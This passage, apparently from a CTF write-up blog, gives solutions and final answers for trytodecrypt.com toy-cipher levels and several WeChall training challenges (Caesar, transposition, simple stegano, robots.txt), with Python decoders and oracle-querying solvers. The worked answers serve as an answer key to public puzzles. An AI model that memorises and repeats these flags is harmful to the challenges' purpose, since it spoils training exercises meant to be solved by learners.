import urllib.request, urllib.parse
API_KEY = 'YOUR_KEY_HERE'
CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! '
target = '00100401400A0120A101C0310F503706004E05B0870A00880D80ED0BE1262890FD16816A1453453721963ED1D11F04624D9'
guess = ''
for pos in range(11):
    for ch in CHARSET:
        test = guess + ch
        url = f'http://api.trytodecrypt.com/encrypt?key={API_KEY}&id=22&text={urllib.parse.quote(test)}'
        resp = urllib.request.urlopen(url).read().decode().strip()
        if resp.upper().startswith(target[:len(test)*9]):
            guess = test
            break
    print(f'  [{pos+1}/11] {guess}')
"

运行过程：

[1/11] m
[2/11] mi
[3/11] mis
[4/11] miss
[5/11] missi
[6/11] missis
[7/11] mississ
[8/11] mississi
[9/11] mississip
[10/11] mississipp
[11/11] mississippi

mississippi

Text 23

E3F59F001361B62958E551B9702F2C6B25F9E3FC350062295A1A20182041493C447BA0767A393A1F278DB14268565F51575C65212A8386494B383F7375676845472F30494C737A406890988B8D50577A835960476B6F73686E6367668B787A494C33357EA4555E191C18216A6F353A173E2026474A8A8C3F481416759D

这题最后的关键不是 PRNG，也不是统计分类，而是 递归套壳：Text 23 的整段 250-hex ciphertext 可以先按 Text19/Text20 那种 front-prefix layout 解出一层 50-hex 中间密文；这个中间密文再用同一个规则解一次，得到真正 plaintext。

第一层：把 250 hex 当成 50 个 5-hex token

目标密文长度是 250 hex。把它整体看成 50 个 5-hex token。

沿用前面 Text 19 / Text 20 里反复出现的 layout：

prefixes = ct[:n]
pairs    = ct[n:]
item_i   = (prefixes[i], pairs[4*i:4*i+2], pairs[4*i+2:4*i+4])
plain_i  = CHARSET[(b_i - a_i) % 71]

对 Text 23，n = 250 / 5 = 50。第一层解出来不是最终明文，而是一个仍然全为 hex 的 50 字符串：

1	6888B418AC9699327212137E82797A464B232C93955D63292E

这一点非常反直觉，因为 API 行为确实显示：

1	len(encrypt(text)) == 25 * len(text)

所以目标明文长度看起来应是 10 字符。但真正结构是：外层把「内层 50-hex 密文」再包了一次。

第二层：对 50-hex 中间密文再解一次

中间密文长度 50 hex，同样可看成 10 个 5-hex token。再跑同一个 decode：

完整复现代码：

CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! '


def decode_once(ct):
    n = len(ct) // 5
    prefixes = ct[:n]
    pairs = ct[n:]

    out = ''
    for i in range(n):
        a = int(pairs[4*i:4*i+2], 16)
        b = int(pairs[4*i+2:4*i+4], 16)
        out += CHARSET[(b - a) % len(CHARSET)]
    return out


target = 'E3F59F001361B62958E551B9702F2C6B25F9E3FC350062295A1A20182041493C447BA0767A393A1F278DB14268565F51575C65212A8386494B383F7375676845472F30494C737A406890988B8D50577A835960476B6F73686E6367668B787A494C33357EA4555E191C18216A6F353A173E2026474A8A8C3F481416759D'

mid = decode_once(target)
plain = decode_once(mid)

print(mid)
print(plain)

3.14159265

WeChall - Training - Crypto - Transposition I

Posted on 2026-05-27 In ctf Disqus:

Challenge

It seems that the simple substitution ciphers are too easy for you. From my own experience I can tell that transposition ciphers are more difficult to attack. However, in this training challenge you should have not much problems to reveal the plaintext.

oWdnreuf.lY uoc nar ae dht eemssga eaw yebttrew eh nht eelttre sra enic roertco drre . Ihtni koy uowlu dilekt oes eoyrup sawsro don:we raphbmnmld.s

A transposition cipher where adjacent character pairs are swapped. The message includes: "Wonderful. You can read the message way better when the letters are in correct order. I think you would like to see your password now: XXXXXXXX"

Solution

Swap each adjacent pair of characters:

ct = "oWdnreuf.lY uoc nar ae dht eemssga eaw yebttrew eh nht eelttre sr..."
chars = list(ct)
for i in range(0, len(chars) - 1, 2):
    chars[i], chars[i+1] = chars[i+1], chars[i]
result = ''.join(chars)
# result: "Wonderful. You can read the message way better when the letters are in correct order..."

Extract the password after "password now: ".

earhpmbmndls

WeChall - Training - Crypto - Caesar II

Posted on 2026-05-27 In ctf Disqus:

Challenge

I guess you are done with Caesar I, aren't you? The big problem with caesar is that it does not allow digits or other characters. I have fixed this, and now I can use any ascii character in the plaintext. The keyspace has increased from 26 to 128 too. /

Enjoy!

Caesar cipher with full ASCII range (0-127). The keyspace has increased from 26 to 128.

Solution

The cipher bytes are displayed as hex values. Decode by trying all 128 shifts:

hex_text="""53 7B 7B 70 20 76 7B 6E 38 20 05 7B 01 20 7F 7B
78 02 71 70 20 7B 7A 71 20 79 7B 7E 71 20 6F 74
6D 78 78 71 7A 73 71 20 75 7A 20 05 7B 01 7E 20
76 7B 01 7E 7A 71 05 3A 20 60 74 75 7F 20 7B 7A
71 20 03 6D 7F 20 72 6D 75 7E 78 05 20 71 6D 7F
05 20 00 7B 20 6F 7E 6D 6F 77 3A 20 63 6D 7F 7A
33 00 20 75 00 4B 20 3D 3E 44 20 77 71 05 7F 20
75 7F 20 6D 20 7D 01 75 00 71 20 7F 79 6D 78 78
20 77 71 05 7F 7C 6D 6F 71 38 20 7F 7B 20 75 00
20 7F 74 7B 01 78 70 7A 33 00 20 74 6D 02 71 20
00 6D 77 71 7A 20 05 7B 01 20 00 7B 7B 20 78 7B
7A 73 20 00 7B 20 70 71 6F 7E 05 7C 00 20 00 74
75 7F 20 79 71 7F 7F 6D 73 71 3A 20 63 71 78 78
20 70 7B 7A 71 38 20 05 7B 01 7E 20 7F 7B 78 01
00 75 7B 7A 20 75 7F 20 6F 7E 73 6D 6E 7C 7F 7B
6D 7C 73 79 3A"""
ct_bytes = [int(x, 16) for x in hex_text.split()]
for K in range(128):
    decoded = ''.join(chr((b - K) % 128) for b in ct_bytes)
    if 'is' in decoded:
        print(f"K={K}: {decoded}")

The space character (0x20) is part of the shift and will appear as a different character after decoding. Replace the most frequent non-alpha character with space to read the message.

crgabpsoapgm

WeChall - Training - Stegano I

Posted on 2026-05-26 Edited on 2026-05-27 In ctf Disqus:

Challenge

A 4×4 pixel BMP image with hidden data. The challenge title says "This is the most basic image stegano I can think of."

Solution

Download the BMP file and read the pixel data directly — the message is stored as plaintext in the pixel bytes, not hidden with LSB steganography.

1 2	$ curl -O https://www.wechall.net/en/challenge/training/stegano1/stegano1.bmp $ xxd stegano1.bmp \| head -5

The pixel data at offset 54 contains the ASCII message:

1
2
3

4c 6f 6f 6b 20 77 68 61 74 20 74 68 65 20 68 65
78 2d 65 64 69 74 20 72 65 76 65 61 6c 65 64 3a
20 70 61 73 73 77 64 3a 73 74 65 67 61 6e 6f 49

Decoded: "Look what the hex-editor revealed: passwd:steganoI"

steganoI

WeChall - ASCII

Posted on 2026-05-26 In ctf Disqus:

Challenge

The page displays a string of ASCII numeric codes:

1	84, 104, 101, 32, 115, 111, 108, 117, 116, 105, 111, 110, 32, 105, 115, 58, 32, 111, 114, 100, 97, 101, 110, 112, 114, 115, 115, 105, 112

Solution

将 ASCII 码数字转换为字符：

1 2	nums = [84, 104, 101, 32, 115, 111, 108, 117, 116, 105, 111, 110, 32, 105, 115, 58, 32, 111, 114, 100, 97, 101, 110, 112, 114, 115, 115, 105, 112] print(''.join(chr(n) for n in nums))

ordaenprssip

WeChall - WWW-Robots

Posted on 2026-05-26 Edited on 2026-05-27 In ctf Disqus:

Challenge

Understanding the robots.txt file.

Solution

访问目标网站的 /robots.txt，查看禁止爬取的路径，T0PS3CR3T 目录就是答案。

$ curl https://www.wechall.net/robots.txt
User-agent: *
Disallow: /challenge/training/www/robots/T0PS3CR3T
...

然后访问 https://www.wechall.net/challenge/training/www/robots/T0PS3CR3T/ 确认。

T0PS3CR3T

WeChall - Training - Crypto - Caesar I

Posted on 2026-05-26 Edited on 2026-05-27 In ctf Disqus:

Challenge

A standard Caesar cipher with random shift per session. The plaintext is: "THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG OF CAESAR AND YOUR UNIQUE SOLUTION IS XXXXXXXX"

Solution

Brute force all 26 shifts and look for "YOUR UNIQUE SOLUTION" in the decoded text.

ciphertext = "JXU GKYSA RHEMD VEN ZKCFI ELUH JXU BQPO TEW EV SQUIQH QDT OEKH KDYGKU IEBKJYED YI DFUWHHDUYVBF"

for shift in range(26):
    result = ''
    for c in ciphertext:
        if c.isalpha():
            base = ord('A')
            result += chr((ord(c) - base - shift) % 26 + base)
        else:
            result += c
    if "YOUR UNIQUE SOLUTION IS" in result:
        solution = result.split("IS ")[-1].split()[0]
        print(f"Solution: {solution}")

The last word after "IS" is the per-session solution.

You can also use CyberChef to decode the ciphertext:

1 2	ROT13_Brute_Force(true,true,false,100,0,true,'') input: JXU GKYSA RHEMD VEN ZKCFI ELUH JXU BQPO TEW EV SQUIQH QDT OEKH KDYGKU IEBKJYED YI DFUWHHDUYVBF

NPEGRRNEIFLP

trytodecrypt.com — hard (13-18)

Posted on 2026-05-25 In CTF Disqus:

tryptodecrypt.com

Hard 级别的密钥嵌入在密文结构本身。

Text 13

59656A6B6F9F656A67746767

首字节 0x59 (89) 为全局 key。后续每字节减 key 得 charset 位置。

def decode_text13(ct):
    """首字节为全局 key"""
    key = int(ct[:2], 16)
    data = [int(ct[i:i+2], 16) for i in range(2, len(ct), 2)]
    return "".join(C[b - key] for b in data)

chim cheree

Text 14

6F5657A6606B7D9C7480649D7A6B757D9C70816B6CB4

前 3 字节 [0x6F, 0x56, 0x57] 为旋转 key。后续每字节依次减去对应 key。

def decode_text14(ct):
    """前 3 字节为旋转 key"""
    keys = [int(ct[i:i+2], 16) for i in range(0, 6, 2)]
    data = [int(ct[i:i+2], 16) for i in range(6, len(ct), 2)]
    return "".join(C[data[i] - keys[i % 3]] for i in range(len(data)))

Take the blue pill!

Text 15

574168755997984F7A7E76AD6954A662538F764F7A5C4F876544

前 6 位 hex 是三个 2 位子密钥 (57, 41, 68)。子密钥交替加密后续字符（密钥 1 加密第 4/7/10...个字符）。字符加密 = 子密钥 + 字符专用偏移量。

第一层：静态替换表

每个字符硬编码一个唯一的偏移量，跟字符集索引无关：

1
2
3

a→0x27  b→0x0b  c→0x41  d→0x45  e→0x0e ...
A→0x1e  B→0x13
空格→0x12  句号→0x03

这就是个查表替换，只不过替换结果不是另外一个字符，是一个数字。

第二层：类维吉尼亚加密

拿替换后的数字，加上循环密钥（57→41→68→57→…），得到最终密文：

A  → 查表得 0x1e  → +密钥 0x57 → 0x75
l  → 查表得 0x18  → +密钥 0x41 → 0x59
i  → 查表得 0x2f  → +密钥 0x68 → 0x97
c  → 查表得 0x41  → +密钥 0x57 → 0x98
...

加密工具虽然每请求随机化（Hard 特性），但是同一个字符在同一个位置的加密结果每次都一样。所以：

加密 "aaaaaa" → 看密文的重复规律，发现每 3 个字节一个周期 → 密钥长度 3
加密 "aaaaaaaaaaaa" → 同一位置加密 "a" 多次 → 确认 "a" 的密文总是 0x7e（当密钥=0x57时）
加密 "ba"、"ca"、"da"… → 算出每个字符的偏移量
密钥值本身：从密文前 6 位直接读出来的（这就是为什么说密钥嵌在密文结构里）

CHAR_OFF = {
    'a': 0x27, 'b': 0x0b, 'c': 0x41, 'd': 0x45, 'e': 0x0e,
    'f': 0x10, 'g': 0x11, 'h': 0x05, 'i': 0x2f, 'j': 0x1c,
    'k': 0x16, 'l': 0x18, 'm': 0x04, 'n': 0x35, 'o': 0x3e,
    'p': 0x37, 'q': 0x1d, 'r': 0x1f, 's': 0x15, 't': 0x21,
    'u': 0x1a, 'v': 0x23, 'w': 0x00, 'x': 0x0c, 'y': 0x3b,
    'z': 0x30, '.': 0x03, ' ': 0x12, 'A': 0x1e, 'B': 0x13,
}
# 反转: 偏移 -> char
OFF_CHAR = {v: k for k, v in CHAR_OFF.items()}

def decode_text15(ct):
    """前 6 hex 为 3 子密钥, data - key[i%3] 得偏移查表"""
    keys = [int(ct[i:i+2], 16) for i in range(0, 6, 2)]
    data = [int(ct[i:i+2], 16) for i in range(6, len(ct), 2)]
    plain = ""
    for i, d in enumerate(data):
        off = d - keys[i % 3]
        plain += OFF_CHAR.get(off, "?")
    return plain

Alice and Bob are here.

Text 16

32632E3149844B82115794BA78AD87C36DA01148707080C65459255C2C6487B02851

每 4 位 hex 一组（2 位偏移 + 2 位编码字符）。编码字符 - 偏移 = 字符集索引。

编码：0=00, 1=01, ..., 9=09, a=0A, ..., z=23, A=24, ..., Z=3D, space=46, fullstop=40。

def decode_text16(ct):
    """4-hex 一组 (2偏移 + 2编码)"""
    pt = ""
    for i in range(0, len(ct), 4):
        off = int(ct[i:i+2], 16)
        enc = int(ct[i+2:i+4], 16)
        cp = enc - off
        pt += C[cp] if 0 <= cp < len(C) else "?"
    return pt

N3XT CRYPT0 5TUFF

Text 17

5D2EAF346C9271B7489BBA3A52326752248C2255826771378D741E48205A

密文前半为密钥，后半为编码数据。密钥 - 编码数据 = 字符集索引。

def decode_text17(ct, reverse=False):
    """前半 key 后半数据, key - 数据"""
    half = len(ct) // 2
    keys = [int(ct[i:i+2], 16) for i in range(0, half, 2)]
    data = [int(ct[i:i+2], 16) for i in range(half, len(ct), 2)]
    pt = "".join(C[keys[i] - data[i]] for i in range(len(data)))
    return pt[::-1] if reverse else pt

bazinga he said

Text 18

35445FA0D18F47618981AE5D3A98A5138EAE2A303A5D688B6C4461703B902F308F5F125F7725

与 Text 17 相同算法，但明文在加密前被反转了。

1
2
3

def decode_text18(ct):
    """同 Text 17 但结果反转"""
    return decode_text17(ct, reverse=True)

5TL1 9aKu p03z U2a5

trytodecrypt.com — middle (7-12)

Posted on 2026-05-25 In CTF Disqus:

tryptodecrypt.com

字符集 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?!（71 个字符）。

Text 7

21052F151200271512413E35101A152F3511

固定 2-hex 替换表（步长 2）。

same script as easy level

1
2
3

❯ python decrypt_cipher.py 7 2
密文: 21052F151200271512413E35101A152F3511
******************

this was confusing

Text 8

eaidagdagenpmgodlceijmgoefodlceijcnllonmgodlcfilfgamgodnnflgfgafilmgofildihdagmgoefodlccnlcnledddagmgoedddagfobdagedd

3 字符一组的替换密码。

#!/usr/bin/env python3
import re
import subprocess
import sys

C = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "


def encrypt(text_id, text, cookie=""):
    cmd = ["curl", "-s"]
    if cookie:
        cmd += ["-b", cookie]
    cmd += [
        f"https://www.trytodecrypt.com/decrypt.php?id={text_id}",
        "-d",
        f"text={text}&encrypt=Encrypt",
    ]
    r = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    # m = re.findall(r"panel-body[^>]>([0-9a-fA-F]+)</div>", r.stdout)
    m = re.findall(r"panel-body[^>]*>([0-9a-zA-Z]+)</div>", r.stdout)
    return m[1] if len(m) >= 2 else None


def build_mapping(text_id, step, cookie=""):
    mapping = {}
    for i in range(0, len(C), 20):  # 每次 20 字符，多数服务端限制 50
        batch = C[i : i + 20]
        enc = encrypt(text_id, batch, cookie)
        if enc:
            for j, ch in enumerate(batch):
                mapping[enc[j * step : (j + 1) * step]] = ch
    return mapping


def decode(ct, step, mapping):
    return "".join(mapping.get(ct[i : i + step], "?") for i in range(0, len(ct), step))


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"用法: {sys.argv[0]} <text_id> <step>")
        sys.exit(1)

    text_id = int(sys.argv[1])
    step = int(sys.argv[2])

    ct = sys.stdin.read().strip() if not sys.stdin.isatty() else input("密文: ").strip()

    mapping = build_mapping(text_id, step)
    if not mapping:
        print("ERROR: 映射表为空，检查 text_id / step / 网络连接")
        sys.exit(1)

    print(decode(ct, step, mapping))

1
2
3

❯ python decrypt_cipher_alpha.py 8 3
密文: eaidagdagenpmgodlceijmgoefodlceijcnllonmgodlcfilfgamgodnnflgfgafilmgofildihdagmgoefodlccnlcnledddagmgoedddagfobdagedd
***************************************

keep in mind: its just the middle level

Text 9

6224F12C1C3FAA5AA54836B3C446D6415E74

反转输入后，每字符映射到固定 3-hex 码。解码时反向操作。

#!/usr/bin/env python3
import re
import subprocess
import sys

C = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "


def encrypt(text_id, text, cookie=""):
    cmd = ["curl", "-s"]
    if cookie:
        cmd += ["-b", cookie]
    cmd += [
        f"https://www.trytodecrypt.com/decrypt.php?id={text_id}",
        "-d",
        f"text={text}&encrypt=Encrypt",
    ]
    r = subprocess.run(cmd, capture_output=True, text=True, timeout=10)
    m = re.findall(r"panel-body[^>]*>([0-9a-zA-Z]+)</div>", r.stdout)
    return m[1] if len(m) >= 2 else None


def build_mapping(text_id, step, cookie=""):
    mapping = {}
    # 或者把加密块大小改成 1
    for i in range(0, len(C), 20):  # 每次 20 字符，多数服务端限制 50
        batch = C[i : i + 20]
        enc = encrypt(text_id, batch, cookie)
        if enc:
            for j, ch in enumerate(batch):
                # mapping[enc[j * step : (j + 1) * step]] = ch
                mapping[enc[-(j + 1) * step : len(enc) - j * step]] = ch
    return mapping


def decode(ct, step, mapping):
    return "".join(mapping.get(ct[i : i + step], "?") for i in range(0, len(ct), step))


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"用法: {sys.argv[0]} <text_id> <step>")
        sys.exit(1)

    text_id = int(sys.argv[1])
    step = int(sys.argv[2])

    ct = sys.stdin.read().strip() if not sys.stdin.isatty() else input("密文: ").strip()

    mapping = build_mapping(text_id, step)
    if not mapping:
        print("ERROR: 映射表为空，检查 text_id / step / 网络连接")
        sys.exit(1)

    print(decode(ct, step, mapping))

1
2
3

❯ echo "6224F12C1C3FAA5AA54836B3C446D6415E74" | python trytodecrypt_cipher_reverse.py 9 3 | rev

************

fireball 123

Text 10

261129152E152B

7 -> 9 单表替换每个字符固定映射到一个密文块，不依赖位置

10 -> 12 多表替换映射关系随位置变化（Vigenère 风格）

步长 2，偏移量 [16, 17, 18] 循环。enc = charset_pos + offset[pos % 3]。

#!/usr/bin/env python3
"""trytodecrypt CPA solver — 基于网站加密工具建映射表解码

三种模式:
  simple     固定映射（Text 1-8）
  reverse    先反转再加密（Text 9）
  vigenere   逐位置映射（Text 10-12）
  derive     自动推导公式，少量请求解码（Text 10-12 推荐）

用法:
  python trytodecrypt_solve.py <text_id> [options]
  echo '密文' | python trytodecrypt_solve.py <text_id> [options]

选项:
  -s, --step       步长（默认 auto）
  -r, --reverse    反转模式（Text 9）
  -v, --vigenere   Vigenere 模式（逐位置建表，请求多）
  -d, --derive     推导模式（少量请求算公式，Text 10-12 推荐）
  -c, --cookie     PHPSESSID
  -q, --quiet      静默模式
"""

import argparse
import re
import subprocess
import sys
import time

C = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "


def eprint(*args, **kwargs):
    print(*args, file=sys.stderr, **kwargs)


def encrypt(text_id, text, cookie="", retry=3):
    for attempt in range(retry):
        cmd = ["curl", "-s", "--max-time", "15", "--retry", "2"]
        if cookie:
            cmd += ["-b", cookie]
        cmd += [
            f"https://www.trytodecrypt.com/decrypt.php?id={text_id}",
            "-d", f"text={text}&encrypt=Encrypt",
        ]
        try:
            r = subprocess.run(cmd, capture_output=True, text=True, timeout=20)
            m = re.findall(r"panel-body[^>]*>([0-9a-zA-Z]+)</div>", r.stdout)
            if len(m) >= 2:
                return m[1]
        except subprocess.TimeoutExpired:
            pass
        if attempt < retry - 1:
            time.sleep(1)
    return None


def detect_step(text_id, cookie=""):
    for step in [2, 3, 4]:
        enc = encrypt(text_id, "0" * 10, cookie)
        if enc and len(enc) == step * 10:
            return step
    enc = encrypt(text_id, "0", cookie)
    if enc:
        return len(enc)
    return 2


def build_mapping_simple(text_id, step, cookie="", batch=20, reverse=False):
    mapping = {}
    for i in range(0, len(C), batch):
        plain = C[i:i + batch]
        enc = encrypt(text_id, plain, cookie)
        if not enc:
            continue
        groups = [enc[j * step:(j + 1) * step] for j in range(len(plain))]
        if reverse:
            groups.reverse()
        for j, ch in enumerate(plain):
            mapping[groups[j]] = ch
    return mapping


def build_mapping_vigenere(text_id, step, ct_len, cookie="", quiet=False):
    mapping = [{} for _ in range(ct_len)]
    total = ct_len * len(C)
    done = 0
    t0 = time.time()
    for pos in range(ct_len):
        prefix = "0" * pos
        for ch in C:
            plain = prefix + ch
            enc = encrypt(text_id, plain, cookie)
            if enc:
                key = enc[pos * step:(pos + 1) * step]
                mapping[pos][key] = ch
            done += 1
            if not quiet and done % 50 == 0:
                elapsed = time.time() - t0
                eprint(f"  [{done}/{total}] {done/total*100:.0f}%  eta {elapsed/done*(total-done):.0f}s")
    if not quiet:
        eprint(f"  [{total}/{total}] 100%  ({time.time()-t0:.0f}s)")
    return mapping


def derive_vigenere(text_id, step, ct_len, cookie=""):
    """推导公式模式：少量请求算出 key，直接解码"""
    # 加密 "0"*n 获取每个位置的基值
    enc_zeros = encrypt(text_id, "0" * ct_len, cookie)
    if not enc_zeros:
        return None
    bases = [int(enc_zeros[p * step:(p + 1) * step], 16) for p in range(ct_len)]

    # 加密 "1"*n 获取梯子
    enc_ones = encrypt(text_id, "1" * ct_len, cookie)
    if enc_ones:
        steps = [int(enc_ones[p * step:(p + 1) * step], 16) - bases[p] for p in range(ct_len)]
    else:
        steps = [0] * ct_len

    return bases, steps


def decode_with_key(ct, step, bases, steps):
    """用推导出的 key 解码"""
    pt = ""
    for i in range(len(ct) // step):
        val = int(ct[i * step:(i + 1) * step], 16)
        # enc = base + cp * step
        if steps[i] != 0:
            cp = round((val - bases[i]) / steps[i])
        else:
            cp = val - bases[i]
        if 0 <= cp < len(C):
            pt += C[cp]
        else:
            pt += "?"
    return pt


def decode_simple(ct, step, mapping):
    return "".join(mapping.get(ct[i:i + step], "?") for i in range(0, len(ct), step))


def decode_vigenere(ct, step, mapping):
    return "".join(
        mapping[i].get(ct[i * step:(i + 1) * step], "?")
        for i in range(len(mapping))
    )


def main():
    ap = argparse.ArgumentParser(description="trytodecrypt CPA solver")
    ap.add_argument("text_id", type=int, help="题目 ID")
    ap.add_argument("-s", "--step", type=int, default=0, help="步长（默认 auto）")
    ap.add_argument("-r", "--reverse", action="store_true", help="反转模式（Text 9）")
    ap.add_argument("-v", "--vigenere", action="store_true", help="Vigenere 模式（逐位置建表）")
    ap.add_argument("-d", "--derive", action="store_true", help="推导模式（少量请求算公式）")
    ap.add_argument("-c", "--cookie", default="", help="PHPSESSID")
    ap.add_argument("-q", "--quiet", action="store_true", help="静默模式")
    ap.add_argument("--batch", type=int, default=20, help="每批字符数（默认 20，simple 专用）")
    args = ap.parse_args()

    ct = sys.stdin.read().strip() if not sys.stdin.isatty() else input("密文: ").strip()
    if not ct:
        eprint("ERROR: 未提供密文")
        sys.exit(1)

    step = args.step or detect_step(args.text_id, args.cookie)
    if not args.quiet:
        eprint(f"[*] 步长: {step}")

    if args.derive:
        ct_len = len(ct) // step
        if not args.quiet:
            eprint(f"[*] 推导模式: {ct_len} 个位置")
        result = derive_vigenere(args.text_id, step, ct_len, args.cookie)
        if result is None:
            eprint("ERROR: 推导失败")
            sys.exit(1)
        bases, steps = result
        if not args.quiet:
            eprint(f"[*] bases: {bases}")
            eprint(f"[*] steps: {steps}")
        print(decode_with_key(ct, step, bases, steps))

    elif args.vigenere:
        ct_len = len(ct) // step
        if not args.quiet:
            eprint(f"[*] Vigenere: {ct_len} × {len(C)} = {ct_len * len(C)} 次请求")
        mapping = build_mapping_vigenere(args.text_id, step, ct_len, args.cookie, args.quiet)
        if not mapping[0]:
            eprint("ERROR: 映射表为空")
            sys.exit(1)
        print(decode_vigenere(ct, step, mapping))

    else:
        mode = "reverse" if args.reverse else "simple"
        if not args.quiet:
            eprint(f"[*] 模式: {mode}")
        mapping = build_mapping_simple(args.text_id, step, args.cookie, args.batch, args.reverse)
        if not mapping:
            eprint("ERROR: 映射表为空")
            sys.exit(1)
        print(decode_simple(ct, step, mapping))


if __name__ == "__main__":
    main()

❯ python trytodecrypt_solve.py -v 10 -c "8rubc5nmtqala9gvdj8t7cigqn" -s 2 -d
密文: 261129152E152B
[*] 步长: 2
[*] 推导模式: 7 个位置
[*] bases: [16, 17, 18, 16, 17, 18, 16]
[*] steps: [1, 1, 1, 1, 1, 1, 1]
*******

m0n5t3r

Text 11

3785824AD56B2531A7150DF44C21434A61E63F040A42F2012BC2F43F0AD535D24D46013213866D7E0

步长 3 hex，6 位循环。基值 [168, 282, 567, 57, 245, 180]，乘数 [12, 47, 21, 19, 35, 9]。

密文值 = 基值[位置] + 字符位置 × 倍率[位置]

same as Text 10

❯ python trytodecrypt_solve.py -v 11 -c "8rubc5nmtqala9gvdj8t7cigqn" -s 3 -d
密文: 3785824AD56B2531A7150DF44C21434A61E63F040A42F2012BC2F43F0AD535D24D46013213866D7E0
[*] 步长: 3
[*] 推导模式: 27 个位置
[*] bases: [168, 282, 567, 57, 245, 180, 168, 282, 567, 57, 245, 180, 168, 282, 567, 57, 245, 180, 168, 282, 567, 57, 245, 180, 168, 282, 567]
[*] steps: [12, 47, 21, 19, 35, 9, 12, 47, 21, 19, 35, 9, 12, 47, 21, 19, 35, 9, 12, 47, 21, 19, 35, 9, 12, 47, 21]
***************************

You are very good. Respect!

Text 12

00D02703603C0450461340870A50B50EA10A0BD133

基值为三角数 T(pos+1) = (pos+1)(pos+2)/2，步长 (pos+2)/2。

C = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_.,;:?! "
ct = "00D02703603C0450461340870A50B50EA10A0BD133"
vals = [int(ct[i*3:(i+1)*3], 16) for i in range(14)]
print("".join(C[round((v - (i+1)*(i+2)//2) / ((i+2)/2))] for i, v in enumerate(vals)))

cookie monster